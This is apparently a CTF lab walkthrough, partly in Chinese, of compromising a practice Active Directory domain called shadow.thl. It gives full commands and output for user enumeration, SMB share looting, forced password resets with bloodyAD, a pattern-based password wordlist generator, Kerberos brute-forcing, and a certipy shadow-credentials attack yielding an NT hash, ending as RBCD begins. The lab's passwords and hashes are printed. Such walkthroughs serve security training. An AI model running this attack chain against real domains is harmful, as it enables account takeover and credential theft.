Nmap

[/home/kali/temp]$ cat nmap.result                  
# Nmap 7.95 scan initiated Sun Jul 12 10:00:50 2026 as: /usr/lib/nmap/nmap -A -p- -oN nmap.result 192.168.237.138
Nmap scan report for 192.168.237.138
Host is up (0.00049s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-12 02:02:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after:  2027-06-21T22:08:16
445/tcp   open  microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: SHADOW)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after:  2027-06-21T22:08:16
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after:  2027-06-21T22:08:16
3269/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: shadow.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=Seerver.shadow.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:Seerver.shadow.thl
| Not valid before: 2026-06-21T22:08:16
|_Not valid after:  2027-06-21T22:08:16
|_ssl-date: 2026-07-12T02:04:13+00:00; 0s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49685/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49704/tcp open  msrpc        Microsoft Windows RPC
57914/tcp open  msrpc        Microsoft Windows RPC
58794/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:16:42:DB (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2016|10|2012|2022|Phone|7 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2016 (97%), Microsoft Windows 10 1607 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2022 (91%), Microsoft Windows Phone 7.5 or 8.0 (88%), Microsoft Windows Embedded Standard 7 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: SEERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Seerver
|   NetBIOS computer name: SEERVER\x00
|   Domain name: shadow.thl
|   Forest name: shadow.thl
|   FQDN: Seerver.shadow.thl
|_  System time: 2026-07-11T19:03:33-07:00
| smb2-time: 
|   date: 2026-07-12T02:03:33
|_  start_date: 2026-07-12T01:52:20
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_nbstat: NetBIOS name: SEERVER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:16:42:db (VMware)
|_clock-skew: mean: 59m59s, deviation: 2h38m44s, median: 0s

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 192.168.237.138

UserEnum

[/home/kali/temp]$ kerbrute userenum -d shadow.thl --dc 192.168.237.138 /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/12/26 - Ronnie Flathers @ropnop

2026/07/12 10:30:45 >  Using KDC(s):
2026/07/12 10:30:45 >   192.168.237.138:88

2026/07/12 10:30:45 >  [+] VALID USERNAME:       shadow@shadow.thl
2026/07/12 10:30:45 >  [+] VALID USERNAME:       guest@shadow.thl
2026/07/12 10:30:45 >  [+] VALID USERNAME:       Shadow@shadow.thl
2026/07/12 10:30:45 >  [+] VALID USERNAME:       jsmith@shadow.thl
2026/07/12 10:30:45 >  [+] VALID USERNAME:       administrator@shadow.thl
2026/07/12 10:30:46 >  [+] VALID USERNAME:       SHADOW@shadow.thl
2026/07/12 10:30:46 >  [+] VALID USERNAME:       Guest@shadow.thl
2026/07/12 10:30:46 >  [+] VALID USERNAME:       Administrator@shadow.thl
2026/07/12 10:30:47 >  [+] VALID USERNAME:       helpdesk@shadow.thl
2026/07/12 10:30:49 >  [+] VALID USERNAME:       GUEST@shadow.thl
2026/07/12 10:30:50 >  [+] VALID USERNAME:       JSmith@shadow.thl
2026/07/12 10:30:58 >  [+] VALID USERNAME:       Jsmith@shadow.thl
2026/07/12 10:31:10 >  [+] VALID USERNAME:       itsupport@shadow.thl
2026/07/12 10:31:21 >  [+] VALID USERNAME:       JSMITH@shadow.thl
2026/07/12 10:31:27 >  Done! Tested 624370 usernames (14 valid) in 42.334 seconds

SMB - Get User(shadow) Password

smbmap 可以通过 guest 查看到 Incidents 目录

[/home/kali/temp]$ smbmap -H 192.168.237.138 -u guest 

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
                                                                                                                             
[+] IP: 192.168.237.138:445     Name: shadow.thl                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DataRecovery                                            NO ACCESS
        Incidents                                               READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
[*] Closed 1 connections    

里面有一个 Support.txt ,将其下载下来

[/home/kali/temp]$ smbmap -H 192.168.237.138 -u guest -r Incidents                       

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
                                                                                                                             
[+] IP: 192.168.237.138:445     Name: shadow.thl                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DataRecovery                                            NO ACCESS
        Incidents                                               READ ONLY
        ./Incidents
        dr--r--r--                0 Thu Jun 18 07:21:45 2026    .
        dr--r--r--                0 Thu Jun 18 07:21:45 2026    ..
        fr--r--r--             1134 Fri Jun 19 00:49:29 2026    Support.txt
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
[*] Closed 1 connections                                                                                                     
[/home/kali/temp]$ smbmap -H 192.168.237.138 -u guest --download Incidents/Support.txt

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting download: Incidents\Support.txt (1134 bytes)
[+] File output to: /home/kali/temp/192.168.237.138-Incidents_Support.txt
[*] Closed 1 connections  

Support.txt 中发现 shadow 用户的密码

[/home/kali/temp]$ cat  192.168.237.138-Incidents_Support.txt 
IT: Hello, IT Support. Who am I speaking with?

Employee: Hi, this is Shadow.

IT: Perfect, Shadow. I'm reviewing your password reset request. Could you please confirm your corporate username?

Employee: Yes, shadow@shadow.thl.

IT: Thank you. To verify your identity, can you confirm your department or internal extension?

Employee: Security Department, extension 3107.

IT: Perfect, that matches our records. I�m going to proceed with resetting your Active Directory password for the shadow.thl domain.

(pause while the password is being reset)

IT: Done, Shadow. I�ve generated your temporary password.

Employee: What�s the new password?

IT: Your temporary password is:
)*7UbH5\,:K(91lD9W0RN+e

I recommend logging in as soon as possible and changing it immediately to a new password that only you know.

Employee: Understood.

IT: Perfect. Please remember that this is a temporary password for the shadow.thl domain and it may expire if you do not change it shortly. If you experience any issues, please contact IT Support.

Employee: Alright, thank you.

IT: You�re welcome. Have a great day.

Bloodhound

bloodhound 做一下信息收集

[/home/kali/temp]$ bloodhound-python -d shadow.thl -u shadow -p ')*7UbH5\,:K(91lD9W0RN+e' -c All -ns 192.168.237.138 --zip                   
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: shadow.thl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: Seerver.shadow.thl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Seerver.shadow.thl
INFO: Found 14 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Seerver.shadow.thl
INFO: Done in 00M 00S
INFO: Compressing output into 20260712103321_bloodhound.zip

Own User(secadmin)

然后查看 shadow 用户的权限,完全掌控 secadmin 用户

直接修改密码

[/home/kali/temp]$ bloodyAD --dc 192.168.237.138 -d shadow.thl -u shadow -p ')*7UbH5\,:K(91lD9W0RN+e' set password SECADMIN 'Hyh123@'
[+] Password changed successfully!

Own User(svc_backup)

再查看 secadmin 可以强制修改 svc_backup 用户的密码

[/home/kali/temp]$ bloodyAD --dc 192.168.237.138 -d shadow.thl -u SECADMIN -p 'Hyh123@' set password svc_backup 'Hyh123@'
[+] Password changed successfully!

SMB - Get Password Policy

查看 svc_backup 用户的所属组,发现有一个 DATARECOVERY,在之前 SMB 的目录里也有一个

查看发现有一个 pdf 文件

[/home/kali/temp]$ smbmap -H 192.168.237.138 -u svc_backup -p 'Hyh123@' -r DataRecovery

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
                                                                                                                             
[+] IP: 192.168.237.138:445     Name: shadow.thl                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        DataRecovery                                            READ ONLY
        ./DataRecovery
        dr--r--r--                0 Sun Jun 21 02:23:32 2026    .
        dr--r--r--                0 Sun Jun 21 02:23:32 2026    ..
        fr--r--r--            20019 Sun Jun 21 02:23:32 2026    Red Team Internal Report 2026.pdf
        Incidents                                               NO ACCESS
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
[*] Closed 1 connections                                                                         

将其下载下来

[/home/kali/temp]$ smbmap -H 192.168.237.138 -u svc_backup -p 'Hyh123@' --download DataRecovery/'Red Team Internal Report 2026.pdf'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting download: DataRecovery\Red Team Internal Report 2026.pdf (20019 bytes)
[+] File output to: /home/kali/temp/192.168.237.138-DataRecovery_Red Team Internal Report 2026.pdf                       
[*] Closed 1 connections  

内容如下

Internal Red Team Report 2026

Password Policy Assessment

SHADOWS.THL

Executive Summary

During adversary simulation activities conducted by the Red Team in the

SHADOWS.THL environment, several weaknesses related to password management and

usage within the organization were identified. These weaknesses significantly

increase the risk of unauthorized access to corporate systems, directly

impacting the confidentiality, integrity, and availability of information. The

tests performed showed that current password policies allow scenarios

susceptible to brute-force attacks, password spraying, credential reuse, and

compromise of privileged accounts. Additionally, credential construction

patterns were observed that could facilitate password prediction in controlled

attack simulation scenarios.

Scope

Active Directory user accounts in SHADOWS.THL

Internal services authenticated via corporate credentials

Internal web applications

Remote access (VPN / RDP / SSH where applicable)

Administration platforms and management systems

Domain policies related to authentication and account lockout

Findings

1. Insufficient Password Complexity

It was identified that a significant portion of users employ passwords based on

predictable patterns.

Among the most common patterns observed:

Organization name or variations of it

Use of the internal domain (shadows.thl / SHADOWS / shadow)

Seasons of the year

Months of the year

Current or recent years

Simple character substitutions (e.g., a → @, o → 0)

Observed examples:

Shadow2025!

Shadows.Thl2024!

Verano2025!

Password123!

Risk: High

An attacker could compromise multiple accounts through password spraying attacks

using combinations derived from organizational patterns and common password

lists.

Password BruteForce

大致的意思就是说密码是有规律的,因此让 AI 给我写了一个生成脚本

import itertools

# --- 基础词根:组织名称及变体 ---
org_bases = [
    "Shadow", "Shadows", "shadow", "shadows",
    "ShadowsThl", "Shadows.Thl", "ShadowThl", "Shadow.Thl",
    "SHADOWS", "SHADOW"
]

# --- 季节 (西语/英语均包含,报告中出现了Verano) ---
seasons = [
    "Verano", "Invierno", "Otono", "Primavera",  # 西语季节
    "Summer", "Winter", "Autumn", "Spring"        # 英语季节
]

# --- 月份 ---
months = [
    "Enero","Febrero","Marzo","Abril","Mayo","Junio",
    "Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre",
    "January","February","March","April","May","June",
    "July","August","September","October","November","December"
]

# --- 常见基础词 ---
common_words = ["Password", "Welcome", "Admin", "Login", "Corp", "Company"]

# --- 年份范围 ---
years = [str(y) for y in range(2022, 2027)]

# --- 常见结尾符号/后缀 ---
suffixes = ["!", "!!", "#", "@", "123", "1!", "2024!", "2025!"]

def leetspeak_variants(word):
    """生成简单字符替换变体 (a->@, o->0, i->1, e->3, s->$)"""
    subs = {'a':'@','A':'@','o':'0','O':'0','i':'1','I':'1','e':'3','E':'3','s':'$','S':'$'}
    variants = {word}
    for char, repl in subs.items():
        if char in word:
            variants.add(word.replace(char, repl))
    return variants

wordlist = set()

base_words = org_bases + seasons + months + common_words

for word in base_words:
    for variant in leetspeak_variants(word):
        # 词根 + 年份 + 后缀
        for year in years:
            for suf in suffixes:
                wordlist.add(f"{variant}{year}{suf}")
        # 词根 + 后缀 (无年份)
        for suf in suffixes:
            wordlist.add(f"{variant}{suf}")
        # 词根单独 + 年份
        for year in years:
            wordlist.add(f"{variant}{year}")

# 组织名 + 季节/月份 组合
for org in org_bases:
    for s in seasons + months:
        for year in years:
            wordlist.add(f"{org}{s}{year}!")
            wordlist.add(f"{org}.{s}{year}!")

# 报告中明确提到的示例(保留原样确保覆盖)
wordlist.update([
    "Shadow2025!", "Shadows.Thl2024!", "Verano2025!", "Password123!"
])

sorted_list = sorted(wordlist)
with open("shadows_thl_weak_passwords.txt", "w") as f:
    f.write("\n".join(sorted_list))

print(f"生成密码条目数: {len(sorted_list)}")

成功爆破到 helpdesk 用户的密码

[/home/kali/temp]$ kerbrute bruteuser -d shadow.thl --dc 192.168.237.138 shadows_thl_weak_passwords.txt helpdesk 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/12/26 - Ronnie Flathers @ropnop

2026/07/12 10:52:41 >  Using KDC(s):
2026/07/12 10:52:41 >   192.168.237.138:88

2026/07/12 10:53:00 >  [+] VALID LOGIN:  helpdesk@shadow.thl:Shadows.Thl2026@
2026/07/12 10:53:00 >  Done! Tested 8811 logins (1 successes) in 18.905 seconds

Shadow Credentials - Own User(auditmgr)

helpdesk 用户对 auditmgrGenericWrite 权限

通过 certipy 工具拿到 NT hash

[/home/kali/temp]$ certipy shadow auto -u 'helpdesk@shadow.thl' -p 'Shadows.Thl2026@' -account 'AUDITMGR' -dc-ip 192.168.237.138 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'auditmgr'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'cd49fc43-04c6-8989-436c-3d4982cf5932'
[*] Adding Key Credential with device ID 'cd49fc43-04c6-8989-436c-3d4982cf5932' to the Key Credentials for 'auditmgr'
[*] Successfully added Key Credential with device ID 'cd49fc43-04c6-8989-436c-3d4982cf5932' to the Key Credentials for 'auditmgr'
[*] Authenticating as 'auditmgr' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'auditmgr@shadow.thl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'auditmgr.ccache'
[*] Wrote credential cache to 'auditmgr.ccache'
[*] Trying to retrieve NT hash for 'auditmgr'
[*] Restoring the old Key Credentials for 'auditmgr'
[*] Successfully restored the old Key Credentials for 'auditmgr'
[*] NT hash for 'auditmgr': 98019215ea3bcb223dacec8fc12a71aa

RBCD

RBCD 是 Windows Server 2012 引入的一种委派机制,允许资源自己决定“谁能冒充别人来访问我”。

再看看 auditmgr 的权限,可以将自己加入到 PLATFORMENGINEERING 组,同时完全控制 SEERVER.SHADOW.THL

这个 SEERVER.SHADOW.THL 是个计算机,同时也是域控

[/home/kali/temp]$ bloodyAD --dc 192.168.237.138 -d shadow.thl -u SECADMIN -p 'Hyh123@' get object "CN=SEERVER,OU=DOMAIN CONTROLLERS,DC=shadow,DC=THL"

distinguishedName: CN=SEERVER,OU=Domain Controllers,DC=shadow,DC=thl
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: SEERVER
codePage: 0
countryCode: 0
dNSHostName: Seerver.shadow.thl
dSCorePropagationData: 2026-06-23 20:55:44+00:00
displayName: SEERVER$
instanceType: 4
isCriticalSystemObject: True
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2026-07-12 02:20:15.273752+00:00
lastLogonTimestamp: 2026-07-12 01:52:50.722146+00:00
localPolicyFlags: 0
logonCount: 108
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=shadow,DC=thl; CN=Cert Publishers,CN=Users,DC=shadow,DC=thl
msDFSR-ComputerReferenceBL: CN=WIN-QVIKQRQTP3G,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=shadow,DC=thl
msDS-AdditionalDnsHostName: WIN-QVIKQRQTP3G$; SEERVER$
msDS-GenerationId: /LEsAV8EWfk=
msDS-SupportedEncryptionTypes: 28
nTSecurityDescriptor: O:S-1-5-21-2560516159-2044954141-282354372-512G:S-1-5-21-2560516159-2044954141-282354372-512D:AI(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2560516159-2044954141-282354372-517)(OA;;0x3;bf967aa8-0de6-11d0-a285-00aa003049e2;;S-1-5-32-550)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OA;;SW;72e39547-7b18-11d1-adef-00c04fd8d5cd;;S-1-5-10)(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;S-1-5-10)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0xf01ff;;;S-1-5-21-2560516159-2044954141-282354372-512)(A;;0xf01ff;;;S-1-5-21-2560516159-2044954141-282354372-1112)(A;;0x3;;;S-1-5-10)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2560516159-2044954141-282354372-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2560516159-2044954141-282354372-527)(OA;ID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;;S-1-5-21-2560516159-2044954141-282354372-512)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2560516159-2044954141-282354372-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
name: SEERVER
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=shadow,DC=thl
objectClass: top; person; organizationalPerson; user; computer
objectGUID: d4361ecb-b6d6-4919-9c06-d3ccd177d228
objectSid: S-1-5-21-2560516159-2044954141-282354372-1000
operatingSystem: Windows Server 2016 Standard Evaluation
operatingSystemVersion: 10.0 (14393)
primaryGroupID: 516
pwdLastSet: 2026-06-15 11:44:18.961220+00:00
rIDSetReferences: CN=RID Set,CN=SEERVER,OU=Domain Controllers,DC=shadow,DC=thl
sAMAccountName: SEERVER$
sAMAccountType: 805306369
serverReferenceBL: CN=SEERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=shadow,DC=thl
